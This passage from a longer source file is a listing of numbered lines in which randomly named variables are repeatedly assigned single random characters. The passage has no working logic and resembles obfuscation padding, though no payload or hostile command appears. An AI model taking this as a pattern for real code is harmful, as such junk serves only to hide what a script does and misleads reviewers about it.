745 | welxi = "o"; | |
746 | welxi = "Q"; | |
747 | welxi = "K"; | |
748 | welxi = "c"; | |
749 | welxi = "D"; | |
750 | welxi = "U"; | |
751 | welxi = "n"; | |
752 | welxi = "z"; | |
753 | welxi = "Q"; | |
754 | welxi = "A"; | |
755 | welxi = "t"; | |
756 | welxi = "k"; | |
757 | welxi = "W"; | |
758 | welxi = "L"; | |
759 | welxi = "q"; | |
760 | welxi = "l"; | |
761 | welxi = "t"; | |
762 | welxi = "p"; | |
763 | welxi = "S"; | |
764 | welxi = "w"; | |
765 | welxi = "g"; | |
766 | welxi = "s"; | |
767 | welxi = "0"; | |
768 | hiees = "j"; | |
769 | hiees = "t"; | |
770 | hiees = "H"; | |
771 | hiees = "U"; | |
772 | hiees = "I"; | |
773 | hiees = "w"; | |
774 | hiees = "Y"; | |
775 | hiees = "x"; | |
776 | hiees = "M"; | |
777 | hiees = "Y"; | |
778 | hiees = "k"; | |
779 | hiees = "l"; | |
780 | hiees = "C"; | |
781 | hiees = "S"; | |
782 | hiees = "X"; | |
783 | hiees = "I"; | |
784 | hiees = "N"; | |
785 | hiees = "p"; | |
786 | hiees = "Q"; | |
787 | hiees = "w"; | |
788 | hiees = "d"; | |
789 | hiees = "h"; | |
790 | hiees = "i"; | |
791 | hiees = "K"; | |
792 | hiees = "U"; | |
793 | jjsky = "E"; | |
794 | jjsky = "j"; | |
795 | jjsky = "G"; | |
796 | jjsky = "W"; | |
797 | jjsky = "M"; | |
798 | jjsky = "p"; | |
799 | jjsky = "i"; | |
800 | jjsky = "p"; | |
801 | jjsky = "Z"; | |
802 | jjsky = "M"; | |
803 | jjsky = "F"; | |
804 | jjsky = "w"; | |
805 | jjsky = "t"; | |
806 | jjsky = "m"; | |
807 | jjsky = "Y"; | |
808 | jjsky = "r"; | |
809 | jjsky = "F"; | |
810 | jjsky = "r"; | |
811 | jjsky = "A"; | |
812 | jjsky = "L"; | |
813 | jjsky = "j"; | |
814 | jjsky = "c"; | |
815 | jjsky = "q"; | |
816 | jjsky = "b"; | |
817 | jjsky = "R"; | |
818 | jjsky = "X"; | |
819 | jjsky = "F"; | |
820 | jjsky = "l"; | |
821 | jjsky = "K"; | |
822 | jjsky = "J"; | |
823 | jjsky = "L"; | |
824 | jjsky = "y"; | |
825 | jjsky = "T"; | |
826 | jjsky = "m"; | |
827 | qcklse = "b"; | |
828 | qcklse = "c"; | |
829 | qcklse = "x"; | |
830 | qcklse = "L"; | |
831 | qcklse = "X"; | |
832 | qcklse = "S"; | |
833 | qcklse = "Q"; | |
834 | qcklse = "f"; | |
835 | qcklse = "i"; | |
836 | qcklse = "e"; | |
837 | qcklse = "L"; | |
838 | qcklse = "T"; | |
839 | qcklse = "n"; | |
840 | qcklse = "I"; | |
841 | qcklse = "i"; | |
842 | qcklse = "L"; | |
843 | qcklse = "V"; | |
844 | qcklse = "e"; | |
845 | qcklse = "J"; | |
846 | qcklse = "h"; | |
847 | qcklse = "f"; | |
848 | qcklse = "m"; | |
849 | qcklse = "c"; | |
850 | qcklse = "d"; | |
851 | qcklse = "j"; | |
852 | qcklse = "w"; | |
853 | qcklse = "O"; | |
854 | qcklse = "g"; | |
855 | qcklse = "O"; | |
856 | qcklse = "P"; | |
857 | qcklse = "P"; | |
858 | qcklse = "T"; | |
859 | qcklse = "g"; | |
860 | qcklse = "M"; | |
861 | qcklse = "i"; | |
862 | qcklse = "b"; | |
863 | qcklse = "E"; | |
864 | qcklse = "f"; | |
865 | qcklse = "H"; | |
866 | qcklse = "A"; | |
867 | qcklse = "f"; | |
868 | qcklse = "\\"; | |
869 | fcmbjmc = "u"; | |
870 | fcmbjmc = "E"; | |
871 | fcmbjmc = "T"; | |
872 | fcmbjmc = "w"; | |
873 | fcmbjmc = "k"; | |
874 | fcmbjmc = "s"; | |
875 | fcmbjmc = "W"; | |
876 | fcmbjmc = "G"; | |
877 | fcmbjmc = "o"; | |
878 | fcmbjmc = "s"; | |
879 | fcmbjmc = "P"; | |
880 | fcmbjmc = "Z"; | |
881 | fcmbjmc = "a"; | |
882 | fcmbjmc = "A"; | |
883 | fcmbjmc = "y"; | |
884 | fcmbjmc = "X"; | |
885 | fcmbjmc = "a"; | |
886 | fcmbjmc = "A"; | |
887 | fcmbjmc = "M"; | |
888 | fcmbjmc = "T"; | |
889 | fcmbjmc = "z"; | |
890 | fcmbjmc = "W"; | |
891 | fcmbjmc = "F"; | |
892 | fcmbjmc = "V"; | |
893 | fcmbjmc = "J"; | |
894 | fcmbjmc = "f"; | |
895 | fcmbjmc = "x"; | |
896 | fcmbjmc = "Y"; | |
897 | fcmbjmc = "Q"; | |
898 | fcmbjmc = "H"; | |
899 | fcmbjmc = "a"; | |
900 | fcmbjmc = "B"; | |
901 | fcmbjmc = "N"; | |
902 | fcmbjmc = "F"; | |
903 | fcmbjmc = "k"; | |
904 | fcmbjmc = "P"; | |
905 | fcmbjmc = "K"; | |
906 | fcmbjmc = "w"; | |
907 | fcmbjmc = "3"; | |
908 | bzwbeprd = "s"; | |
909 | bzwbeprd = "x"; | |
910 | bzwbeprd = "B"; | |
911 | bzwbeprd = "c"; | |
912 | bzwbeprd = "d"; | |
913 | bzwbeprd = "b"; | |
914 | bzwbeprd = "Z"; | |
915 | bzwbeprd = "i"; | |
916 | bzwbeprd = "f"; | |
917 | bzwbeprd = "m"; | |
918 | bzwbeprd = "w"; | |
919 | bzwbeprd = "e"; | |
920 | bzwbeprd = "q"; | |
921 | bzwbeprd = "I"; | |
922 | bzwbeprd = "r"; | |
923 | bzwbeprd = "P"; | |
924 | bzwbeprd = "Z"; | |
925 | bzwbeprd = "a"; | |
926 | bzwbeprd = "R"; | |
927 | bzwbeprd = "L"; | |
928 | bzwbeprd = "A"; | |
929 | bzwbeprd = "K"; | |
930 | bzwbeprd = "C"; | |
931 | bzwbeprd = "m"; | |
932 | bzwbeprd = "K"; | |
933 | bzwbeprd = "H"; | |
934 | bzwbeprd = "g"; | |
935 | grmbsv = "j"; | |
936 | grmbsv = "J"; | |
937 | grmbsv = "X"; | |
938 | grmbsv = "C"; | |
939 | grmbsv = "S"; | |
940 | grmbsv = "z"; | |
941 | grmbsv = "P"; | |
942 | grmbsv = "d"; | |
943 | grmbsv = "f"; | |
944 | grmbsv = "L"; | |
945 | grmbsv = "W"; | |
946 | grmbsv = "s"; | |
947 | grmbsv = "c"; | |
948 | grmbsv = "R"; | |
949 | grmbsv = "r"; | |
950 | grmbsv = "I"; | |
951 | grmbsv = "F"; | |
952 | grmbsv = "z"; | |
953 | grmbsv = "G"; | |
954 | grmbsv = "U"; | |
955 | grmbsv = "U"; | |
956 | grmbsv = "d"; | |
957 | grmbsv = "Y"; | |
958 | grmbsv = "j"; | |
959 | grmbsv = "Q"; | |
960 | grmbsv = "J"; | |
961 | grmbsv = "V"; | |
962 | grmbsv = "S"; | |
963 | grmbsv = "F"; | |
964 | grmbsv = "u"; | |
965 | grmbsv = "W"; | |
966 | zlfpyob = "B"; | |
967 | zlfpyob = "R"; | |
968 | zlfpyob = "E"; | |
969 | zlfpyob = "a"; | |
970 | zlfpyob = "R"; | |
971 | zlfpyob = "y"; | |
972 | zlfpyob = "b"; | |
973 | zlfpyob = "C"; | |
974 | zlfpyob = "H"; | |
975 | zlfpyob = "m"; | |
976 | zlfpyob = "z"; | |
977 | zlfpyob = "Y"; | |
978 | zlfpyob = "P"; | |
979 | zlfpyob = "x"; | |
980 | zlfpyob = "b"; | |
981 | zlfpyob = "h"; | |
982 | zlfpyob = "p"; | |
983 | zlfpyob = "I"; | |
984 | zlfpyob = "M"; | |
985 | zlfpyob = "S"; | |
986 | zlfpyob = "E"; | |
987 | zlfpyob = "b"; | |
988 | zlfpyob = "N"; | |
989 | zlfpyob = "U"; | |
990 | zlfpyob = "z"; | |
991 | zlfpyob = "Z"; | |
992 | zlfpyob = "f"; | |
993 | zlfpyob = "j"; | |
994 | zlfpyob = "c"; | |
995 | zlfpyob = "E"; | |
996 | zlfpyob = "U"; | |
997 | zlfpyob = "J"; | |
998 | zlfpyob = "X"; | |
999 | zlfpyob = "J"; | |
1000 | zlfpyob = "x"; | |
1001 | nkfixqv = "L"; | |
1002 | nkfixqv = "i"; | |
1003 | nkfixqv = "c"; | |
1004 | nkfixqv = "B"; | |
1005 | nkfixqv = "Z"; | |
1006 | nkfixqv = "i"; | |
1007 | nkfixqv = "J"; | |
1008 | nkfixqv = "F"; | |
1009 | nkfixqv = "V"; | |
1010 | nkfixqv = "c"; | |
1011 | nkfixqv = "O"; | |
1012 | nkfixqv = "W"; | |
1013 | nkfixqv = "l"; | |
1014 | nkfixqv = "b"; | |
1015 | nkfixqv = "u"; | |
1016 | nkfixqv = "Q"; | |
1017 | nkfixqv = "X"; | |
1018 | nkfixqv = "Z"; | |
1019 | nkfixqv = "I"; | |
1020 | nkfixqv = "v"; | |
1021 | nkfixqv = "n"; | |
1022 | nkfixqv = "b"; | |
1023 | nkfixqv = "p"; | |
1024 | nkfixqv = "l"; | |
1025 | nkfixqv = "Z"; | |
1026 | nkfixqv = "b"; | |
1027 | nkfixqv = "Y"; | |
1028 | nkfixqv = "F"; | |
1029 | nkfixqv = "u"; | |
1030 | nkfixqv = "G"; | |
1031 | nkfixqv = "V"; | |
1032 | nkfixqv = "C"; | |
1033 | nkfixqv = "I"; | |
1034 | nkfixqv = "n"; | |
1035 | nkfixqv = "V"; | |
1036 | nkfixqv = "c"; | |
1037 | nkfixqv = "d"; | |
1038 | nkfixqv = "F"; | |
1039 | nkfixqv = "L"; | |
1040 | nkfixqv = "T"; | |
1041 | nkfixqv = "q"; | |
1042 | nkfixqv = "a"; | |
1043 | nkfixqv = "w"; | |
1044 | nkfixqv = "k"; | |
1045 | evasuca = "N"; | |
1046 | evasuca = "T"; | |
1047 | evasuca = "p"; | |
1048 | evasuca = "t"; | |
1049 | evasuca = "p"; | |
1050 | rnntfpyds = "n"; | |
1051 | rnntfpyds = "v"; | |
1052 | rnntfpyds = "X"; | |
1053 | rnntfpyds = "I"; | |
1054 | rnntfpyds = "q"; | |
1055 | rnntfpyds = "d"; | |
1056 | rnntfpyds = "k"; | |
1057 | rnntfpyds = "t"; | |
1058 | rnntfpyds = "v"; | |
1059 | rnntfpyds = "t"; | |
1060 | rnntfpyds = "e"; | |
1061 | rnntfpyds = "E"; | |
1062 | rnntfpyds = "w"; | |
1063 | rnntfpyds = "N"; | |
1064 | rnntfpyds = "F"; | |
1065 | rnntfpyds = "I"; | |
1066 | rnntfpyds = "E"; | |
1067 | rnntfpyds = "v"; | |
1068 | rnntfpyds = "n"; | |
1069 | pawkfjsjt = "U"; | |
1070 | pawkfjsjt = "l"; | |
1071 | pawkfjsjt = "x"; | |
1072 | pawkfjsjt = "j"; | |
1073 | pawkfjsjt = "n"; | |
1074 | pawkfjsjt = "h"; | |
1075 | pawkfjsjt = "K"; | |
1076 | pawkfjsjt = "g"; | |
1077 | pawkfjsjt = "x"; | |
1078 | pawkfjsjt = "c"; | |
1079 | pawkfjsjt = "C"; | |
1080 | pawkfjsjt = "R"; | |
1081 | pawkfjsjt = "L"; | |
1082 | pawkfjsjt = "Q"; | |
1083 | pawkfjsjt = "R"; | |
1084 | pawkfjsjt = "w"; | |
1085 | pawkfjsjt = "q"; | |
1086 | pawkfjsjt = "L"; | |
1087 | pawkfjsjt = "b"; | |
1088 | pawkfjsjt = "F"; | |
1089 | pawkfjsjt = "R"; | |
1090 | pawkfjsjt = "b"; | |
1091 | pawkfjsjt = "n"; | |
1092 | pawkfjsjt = "L"; | |
1093 | pawkfjsjt = "&"; | |
1094 | asxllce = "s"; | |
1095 | asxllce = "T"; | |
1096 | adtfhpl = "W"; | |
1097 | adtfhpl = "k"; | |
1098 | adtfhpl = "f"; | |
1099 | adtfhpl = "B"; | |
1100 | adtfhpl = "F"; | |
1101 | adtfhpl = "K"; | |
1102 | adtfhpl = "F"; | |
1103 | adtfhpl = "I"; | |
1104 | adtfhpl = "P"; | |
1105 | adtfhpl = "O"; | |
1106 | adtfhpl = "f"; | |
1107 | adtfhpl = "Z"; | |
1108 | adtfhpl = "O"; | |
1109 | adtfhpl = "s"; | |
1110 | adtfhpl = "L"; | |
1111 | adtfhpl = "j"; | |
1112 | adtfhpl = "f"; | |
1113 | adtfhpl = "C"; | |
1114 | adtfhpl = "X"; | |
1115 | adtfhpl = "u"; | |
1116 | adtfhpl = "p"; | |
1117 | adtfhpl = "y"; | |
1118 | adtfhpl = "x"; | |
1119 | adtfhpl = "X"; | |
1120 | adtfhpl = "c"; | |
1121 | adtfhpl = "m"; | |
1122 | adtfhpl = "I"; | |
1123 | adtfhpl = "T"; | |
1124 | adtfhpl = "T"; | |
1125 | adtfhpl = "L"; | |
1126 | adtfhpl = "F"; | |
1127 | adtfhpl = "e"; | |
1128 | adtfhpl = "v"; | |
1129 | adtfhpl = "c"; | |
1130 | mzdzjteqq = "m"; | |
1131 | mzdzjteqq = "G"; | |
1132 | mzdzjteqq = "k"; | |
1133 | mzdzjteqq = "k"; | |
1134 | mzdzjteqq = "N"; | |
1135 | mzdzjteqq = "g"; | |
1136 | mzdzjteqq = "R"; | |
1137 | mzdzjteqq = "s"; | |
1138 | mzdzjteqq = "l"; | |
1139 | mzdzjteqq = "X"; | |
1140 | mzdzjteqq = "u"; | |
1141 | mzdzjteqq = "D"; | |
1142 | mzdzjteqq = "t"; | |
1143 | mzdzjteqq = "I"; | |
1144 | mzdzjteqq = "C"; | |
1145 | mzdzjteqq = "d"; | |
1146 | mzdzjteqq = "Q"; | |
1147 | mzdzjteqq = "N"; | |
1148 | mzdzjteqq = "k"; | |
1149 | mzdzjteqq = "i"; | |
1150 | mzdzjteqq = "X"; | |
1151 | mzdzjteqq = "c"; | |
1152 | mzdzjteqq = "H"; | |
1153 | mzdzjteqq = "U"; | |
1154 | mzdzjteqq = "F"; | |
1155 | mzdzjteqq = "y"; | |
1156 | mzdzjteqq = "r"; | |
1157 | mzdzjteqq = "e"; | |
1158 | mzdzjteqq = "s"; | |
1159 | mzdzjteqq = "n"; | |
1160 | mzdzjteqq = "S"; | |
1161 | mzdzjteqq = "a"; | |
1162 | mzdzjteqq = "a"; | |
1163 | mzdzjteqq = "z"; | |
1164 | mzdzjteqq = "c"; | |
1165 | mzdzjteqq = "Q"; | |
1166 | mzdzjteqq = "q"; | |
1167 | mzdzjteqq = "T"; | |
1168 | mzdzjteqq = "E"; | |
1169 | mzdzjteqq = "K"; | |
1170 | mzdzjteqq = "r"; | |
1171 | orrfbvza = "e"; | |
1172 | orrfbvza = "G"; | |
1173 | orrfbvza = "X"; | |
1174 | orrfbvza = "R"; | |
1175 | orrfbvza = "O"; | |
1176 | orrfbvza = "S"; | |
1177 | orrfbvza = "T"; | |
1178 | orrfbvza = "F"; | |
1179 | orrfbvza = "I"; | |
1180 | orrfbvza = "n"; | |
1181 | orrfbvza = "c"; | |
1182 | orrfbvza = "s"; | |
1183 | orrfbvza = "t"; | |
1184 | orrfbvza = "s"; | |
1185 | orrfbvza = "Y"; | |
1186 | orrfbvza = "G"; | |
1187 | orrfbvza = "f"; | |
1188 | orrfbvza = "n"; | |
1189 | orrfbvza = "u"; | |
1190 | efardpa = "P"; | |
1191 | efardpa = "K"; | |
1192 | efardpa = "w"; | |
1193 | efardpa = "W"; | |
1194 | efardpa = "F"; | |
1195 | efardpa = "T"; | |
1196 | efardpa = "n"; | |
1197 | efardpa = "t"; | |
1198 | efardpa = "B"; | |
1199 | efardpa = "R"; | |
1200 | efardpa = "i"; | |
1201 | efardpa = "q"; | |
1202 | efardpa = "j"; | |
1203 | efardpa = "N"; | |
1204 | efardpa = "c"; | |
1205 | efardpa = "y"; | |
1206 | efardpa = "F"; | |
1207 | efardpa = "q"; | |
1208 | efardpa = "Y"; | |
1209 | efardpa = "d"; | |
1210 | efardpa = "k"; | |
1211 | efardpa = "Y"; | |
1212 | efardpa = "n"; | |
1213 | efardpa = "X"; | |
1214 | efardpa = "S"; | |
1215 | efardpa = "a"; | |
1216 | efardpa = "Z"; | |
1217 | efardpa = "S"; | |
1218 | efardpa = "n"; | |
1219 | efardpa = "W"; | |
1220 | efardpa = "U"; | |
1221 | efardpa = "q"; | |
1222 | efardpa = "l"; | |
1223 | efardpa = "y"; | |
1224 | efardpa = "X"; | |
1225 | efardpa = "i"; | |
1226 | efardpa = "E"; | |
1227 | tpbboxa = "s"; | |
1228 | tpbboxa = "p"; | |
1229 | tpbboxa = "u"; | |
1230 | tpbboxa = "a"; | |
1231 | tpbboxa = "Z"; | |
1232 | tpbboxa = "y"; | |
1233 | tpbboxa = "C"; | |
1234 | tpbboxa = "y"; | |
1235 | tpbboxa = "Q"; | |
1236 | tpbboxa = "k"; | |
1237 | tpbboxa = "W"; | |
1238 | tpbboxa = "a"; | |
1239 | tpbboxa = "M"; | |
1240 | tpbboxa = "w"; | |
1241 | tpbboxa = "J"; | |
1242 | tpbboxa = "d"; | |
1243 | tpbboxa = "r"; | |
1244 | tpbboxa = "z"; | |
1245 | tpbboxa = "Q"; | |
1246 | tpbboxa = "w"; | |
1247 | tpbboxa = "i"; | |
1248 | tpbboxa = "I"; | |
1249 | tpbboxa = "v"; | |
1250 | tpbboxa = "i"; | |
1251 | tpbboxa = "n"; | |
1252 | tpbboxa = "u"; | |
1253 | tpbboxa = "A"; | |
1254 | tpbboxa = "l"; | |
1255 | tpbboxa = "N"; | |
1256 | shtugb = "w"; | |
1257 | shtugb = "h"; | |
1258 | shtugb = "l"; | |
1259 | shtugb = "r"; | |
1260 | shtugb = "g"; | |
1261 | shtugb = "t"; | |
1262 | shtugb = "D"; | |
1263 | shtugb = "e"; | |
1264 | shtugb = "@"; | |
1265 | ylddfbm = "T"; | |
1266 | ylddfbm = "W"; | |
1267 | ylddfbm = "u"; | |
1268 | ylddfbm = "d"; | |
1269 | ylddfbm = "a"; | |
1270 | ylddfbm = "E"; | |
1271 | ylddfbm = "B"; | |
1272 | ylddfbm = "A"; | |
1273 | ylddfbm = "L"; | |
1274 | ylddfbm = "o"; | |
1275 | ylddfbm = "B"; | |
1276 | ylddfbm = "t"; | |
1277 | ylddfbm = "w"; | |
1278 | ylddfbm = "I"; | |
1279 | ylddfbm = "b"; | |
1280 | ylddfbm = "t"; | |
1281 | ylddfbm = "x"; | |
1282 | ylddfbm = "c"; | |
1283 | ylddfbm = "x"; | |
1284 | ylddfbm = "f"; | |
1285 | ylddfbm = "R"; | |
1286 | ylddfbm = "Y"; | |
1287 | ylddfbm = "S"; | |
1288 | ylddfbm = "p"; | |
1289 | ylddfbm = "w"; | |
1290 | ylddfbm = "L"; | |
1291 | ylddfbm = "H"; | |
1292 | visjty = "J"; | |
1293 | visjty = "s"; | |
1294 | visjty = "G"; | |
1295 | visjty = "Z"; | |
1296 | visjty = "z"; | |
1297 | visjty = "n"; | |
1298 | visjty = "R"; | |
1299 | visjty = "f"; | |
1300 | visjty = "k"; | |
1301 | visjty = "t"; | |
1302 | visjty = "I"; | |
1303 | visjty = "S"; | |
1304 | visjty = "Y"; | |
1305 | visjty = "N"; | |
1306 | visjty = "N"; | |
1307 | visjty = "r"; | |
1308 | visjty = "M"; | |
1309 | visjty = "L"; | |
1310 | visjty = "c"; | |
1311 | visjty = "k"; | |
1312 | visjty = "O"; | |
1313 | visjty = "r"; | |
1314 | visjty = "a"; | |
1315 | visjty = "I"; | |
1316 | visjty = "E"; | |
1317 | visjty = "D"; | |
1318 | visjty = "X"; | |
1319 | visjty = "b"; | |
1320 | visjty = "F"; | |
1321 | visjty = "2"; | |
1322 | jwtbjz = "A"; | |
1323 | jwtbjz = "t"; | |
1324 | jwtbjz = "s"; | |
1325 | jwtbjz = "O"; | |
1326 | jwtbjz = "Q"; | |
1327 | jwtbjz = "N"; | |
1328 | jwtbjz = "r"; | |
1329 | jwtbjz = "k"; | |
1330 | jwtbjz = "b"; | |
1331 | jwtbjz = "X"; | |
1332 | jwtbjz = "Z"; | |
1333 | jwtbjz = "t"; | |
1334 | jwtbjz = "n"; | |
1335 | jwtbjz = "J"; | |
1336 | jwtbjz = "K"; | |
1337 | jwtbjz = "B"; | |
1338 | jwtbjz = "h"; | |
1339 | jwtbjz = "L"; | |
1340 | jwtbjz = "m"; | |
1341 | jwtbjz = "-"; | |
1342 | delqpgdl = "w"; | |
1343 | delqpgdl = "V"; | |
1344 | delqpgdl = "c"; | |
1345 | delqpgdl = "t"; | |
1346 | delqpgdl = "O"; | |
1347 | delqpgdl = "s"; | |
1348 | delqpgdl = "A"; | |
1349 | delqpgdl = "n"; | |
1350 | delqpgdl = "T"; | |
1351 | delqpgdl = "d"; | |
1352 | delqpgdl = "E"; | |
1353 | delqpgdl = "E"; | |
1354 | delqpgdl = "Z"; | |
1355 | delqpgdl = "q"; | |
1356 | delqpgdl = "Y"; | |
1357 | delqpgdl = "U"; | |
1358 | delqpgdl = "N"; | |
1359 | delqpgdl = "r"; | |
1360 | delqpgdl = "U"; | |
1361 | delqpgdl = "q"; | |
1362 | delqpgdl = "V"; | |
1363 | delqpgdl = "t"; | |
1364 | delqpgdl = "f"; | |
1365 | delqpgdl = "u"; | |
1366 | delqpgdl = "J"; | |
1367 | delqpgdl = "w"; | |
1368 | delqpgdl = "D"; | |
1369 | delqpgdl = "E"; | |
1370 | delqpgdl = "I"; | |
1371 | delqpgdl = "F"; | |
1372 | delqpgdl = "r"; | |
1373 | delqpgdl = "O"; | |
1374 | delqpgdl = "l"; | |
1375 | delqpgdl = "Z"; | |
1376 | delqpgdl = "Q"; | |
1377 | delqpgdl = "d"; | |
1378 | delqpgdl = "c"; | |
1379 | delqpgdl = "f"; | |
1380 | ampffhnnd = "N"; | |
1381 | ampffhnnd = "U"; | |
1382 | ampffhnnd = "u"; | |
1383 | ampffhnnd = "S"; | |
1384 | ampffhnnd = "C"; | |
1385 | ampffhnnd = "V"; | |
1386 | ampffhnnd = "v"; | |
1387 | ampffhnnd = "y"; | |
1388 | ampffhnnd = "Q"; | |
1389 | ampffhnnd = "j"; | |
1390 | ampffhnnd = "D"; | |
1391 | ampffhnnd = "C"; | |
1392 | ampffhnnd = "O"; | |
1393 | ampffhnnd = "c"; | |
1394 | ampffhnnd = "D"; | |
1395 | ampffhnnd = "r"; | |
1396 | ampffhnnd = "P"; | |
1397 | ampffhnnd = "l"; | |
1398 | ampffhnnd = "h"; | |
1399 | ampffhnnd = "E"; | |
1400 | ampffhnnd = "g"; | |
1401 | ampffhnnd = "O"; | |
1402 | ampffhnnd = "s"; | |
1403 | ampffhnnd = "i"; | |
1404 | ampffhnnd = "G"; | |
1405 | ampffhnnd = "p"; | |
1406 | ampffhnnd = "Q"; | |
1407 | ampffhnnd = "I"; | |
1408 | ampffhnnd = "q"; | |
1409 | ampffhnnd = "N"; | |
1410 | ampffhnnd = "a"; | |
1411 | ampffhnnd = "V"; | |
1412 | ampffhnnd = "W"; | |
1413 | ampffhnnd = "m"; | |
1414 | ampffhnnd = "n"; | |
1415 | ampffhnnd = "C"; | |
1416 | dbcpintlc = "T"; | |
1417 | dbcpintlc = "r"; | |
1418 | dbcpintlc = "z"; | |
1419 | dbcpintlc = "e"; | |
1420 | dbcpintlc = "q"; | |
1421 | dbcpintlc = "V"; | |
1422 | dbcpintlc = "S"; | |
1423 | dbcpintlc = "X"; | |
1424 | dbcpintlc = "R"; | |
1425 | dbcpintlc = "T"; | |
1426 | dbcpintlc = "z"; | |
1427 | dbcpintlc = "R"; | |
1428 | dbcpintlc = "m"; | |
1429 | dbcpintlc = "c"; | |
1430 | dbcpintlc = "p"; | |
1431 | dbcpintlc = "o"; | |
1432 | dbcpintlc = "M"; | |
1433 | dbcpintlc = "K"; | |
1434 | dbcpintlc = "N"; | |
1435 | dbcpintlc = "Z"; | |
1436 | dbcpintlc = "R"; | |
1437 | dbcpintlc = "G"; | |
1438 | dbcpintlc = "u"; | |
1439 | dbcpintlc = "k"; | |
1440 | dbcpintlc = "x"; | |
1441 | dbcpintlc = "A"; | |
1442 | dbcpintlc = "e"; | |
1443 | dbcpintlc = "D"; | |
1444 | dbcpintlc = "i"; | |
1445 | dbcpintlc = "b"; | |
1446 | dbcpintlc = "I"; | |
1447 | dbcpintlc = "L"; | |
1448 | dbcpintlc = "K"; | |
1449 | iwrwgbwou = "k"; | |
1450 | iwrwgbwou = "p"; | |
1451 | iwrwgbwou = "J"; | |
1452 | iwrwgbwou = "A"; | |
1453 | iwrwgbwou = "u"; | |
1454 | iwrwgbwou = "P"; | |
1455 | iwrwgbwou = "l"; | |
1456 | iwrwgbwou = "Z"; | |
1457 | iwrwgbwou = "B"; | |
1458 | iwrwgbwou = "t"; | |
1459 | iwrwgbwou = "L"; | |
1460 | iwrwgbwou = "E"; | |
1461 | iwrwgbwou = "T"; | |
1462 | iwrwgbwou = "O"; | |
1463 | elfypb = "C"; | |
1464 | elfypb = "c"; | |
1465 | elfypb = "/"; | |
1466 | vutlwrkt = "a"; | |
1467 | vutlwrkt = "C"; | |
1468 | vutlwrkt = "f"; | |
1469 | vutlwrkt = "P"; | |
1470 | vutlwrkt = "B"; | |
1471 | vutlwrkt = "i"; | |
1472 | vutlwrkt = "Q"; | |
1473 | vutlwrkt = "l"; | |
1474 | vutlwrkt = "J"; | |
1475 | vutlwrkt = "R"; | |
1476 | vutlwrkt = "L"; | |
1477 | vutlwrkt = "f"; | |
1478 | vutlwrkt = "D"; | |
1479 | vutlwrkt = "g"; | |
1480 | vutlwrkt = "N"; | |
1481 | vutlwrkt = "F"; | |
1482 | vutlwrkt = "V"; | |
1483 | vutlwrkt = "F"; | |
1484 | vutlwrkt = "K"; | |
1485 | vutlwrkt = "M"; | |
1486 | vutlwrkt = "d"; | |
1487 | vutlwrkt = "A"; | |
1488 | vutlwrkt = "a"; | |
1489 | vutlwrkt = "s"; | |
1490 | vutlwrkt = "O"; | |
1491 | vutlwrkt = "M"; | |
1492 | vutlwrkt = "9"; | |
1493 | eqgce = "c"; | |
1494 | eqgce = "E"; | |
1495 | eqgce = "L"; | |
1496 | eqgce = "n"; | |
1497 | eqgce = "p"; | |
1498 | eqgce = "R"; | |
1499 | eqgce = "x"; | |
1500 | eqgce = "W"; | |
1501 | eqgce = "P"; | |
1502 | eqgce = "q"; | |
1503 | eqgce = "R"; | |
1504 | eqgce = "F"; | |
1505 | eqgce = "f"; | |
1506 | eqgce = "U"; | |
1507 | eqgce = "i"; | |
1508 | eqgce = "e"; | |
1509 | eqgce = "I"; | |
1510 | eqgce = "a"; | |
1511 | eqgce = "Q"; | |
1512 | eqgce = "E"; | |
1513 | eqgce = "t"; | |
1514 | eqgce = "V"; | |
1515 | eqgce = "H"; | |
1516 | eqgce = "t"; | |
1517 | eqgce = "I"; | |
1518 | eqgce = "r"; | |
1519 | eqgce = "w"; | |
1520 | eqgce = "F"; | |
1521 | eqgce = "K"; | |
1522 | eqgce = "l"; | |
1523 | eqgce = "K"; | |
1524 | eqgce = "w"; | |
1525 | eqgce = "Q"; | |
1526 | eqgce = "u"; | |
1527 | eqgce = "e"; | |
1528 | eqgce = "P"; | |
1529 | eqgce = "J"; | |
1530 | eqgce = "L"; | |
1531 | eqgce = "A"; | |
1532 | eqgce = "p"; | |
1533 | eqgce = "c"; | |
1534 | eqgce = "L"; | |
1535 | eqgce = "B"; | |
1536 | eqgce = "P"; | |
1537 | eqgce = "1"; | |
1538 | ujubxe = "a"; | |
1539 | ujubxe = "m"; | |
1540 | ujubxe = "j"; | |
1541 | ujubxe = "a"; | |
1542 | ujubxe = "f"; | |
1543 | ujubxe = "R"; | |
1544 | ujubxe = "a"; | |
1545 | ujubxe = "r"; | |
1546 | ujubxe = "M"; | |
1547 | ujubxe = "O"; | |
1548 | ujubxe = "I"; | |
1549 | ujubxe = "G"; | |
1550 | ujubxe = "w"; | |
1551 | ujubxe = "Z"; | |
1552 | ujubxe = "z"; | |
1553 | ujubxe = "V"; | |
1554 | ujubxe = "n"; | |
1555 | ujubxe = "j"; | |
1556 | ujubxe = "s"; | |
1557 | ujubxe = "s"; | |
1558 | ujubxe = "R"; | |
1559 | ujubxe = "A"; | |
1560 | ujubxe = "F"; | |
1561 | ujubxe = "u"; | |
1562 | ujubxe = "P"; | |
1563 | ujubxe = "F"; | |
1564 | ujubxe = "H"; | |
1565 | ujubxe = "q"; | |
1566 | ujubxe = "G"; | |
1567 | ujubxe = "U"; | |
1568 | ujubxe = "T"; | |
1569 | ujubxe = "D"; | |
1570 | ujubxe = "i"; | |
1571 | xbtgyrs = "z"; | |
1572 | xbtgyrs = "Y"; | |
1573 | xbtgyrs = "J"; | |
1574 | xbtgyrs = "d"; | |
1575 | xbtgyrs = "X"; | |
1576 | xbtgyrs = "D"; | |
1577 | xbtgyrs = "O"; | |
1578 | xbtgyrs = "f"; | |
1579 | xbtgyrs = "R"; | |
1580 | xbtgyrs = "q"; | |
1581 | xbtgyrs = "L"; | |
1582 | xbtgyrs = "W"; | |
1583 | xbtgyrs = "D"; | |
1584 | xbtgyrs = "z"; | |
1585 | xbtgyrs = "u"; | |
1586 | xbtgyrs = "b"; | |
1587 | xbtgyrs = "S"; | |
1588 | xbtgyrs = "V"; | |
1589 | xbtgyrs = "l"; | |
1590 | xbtgyrs = "H"; | |
1591 | xbtgyrs = "G"; | |
1592 | xbtgyrs = "B"; | |
1593 | xbtgyrs = "j"; | |
1594 | xbtgyrs = "k"; | |
1595 | xbtgyrs = "e"; | |
1596 | xbtgyrs = "Q"; | |
1597 | xbtgyrs = "d"; | |
1598 | xbtgyrs = "i"; | |
1599 | xbtgyrs = "R"; | |
1600 | xbtgyrs = "n"; | |
1601 | xbtgyrs = "A"; | |
1602 | xbtgyrs = "h"; | |
1603 | xbtgyrs = "j"; | |
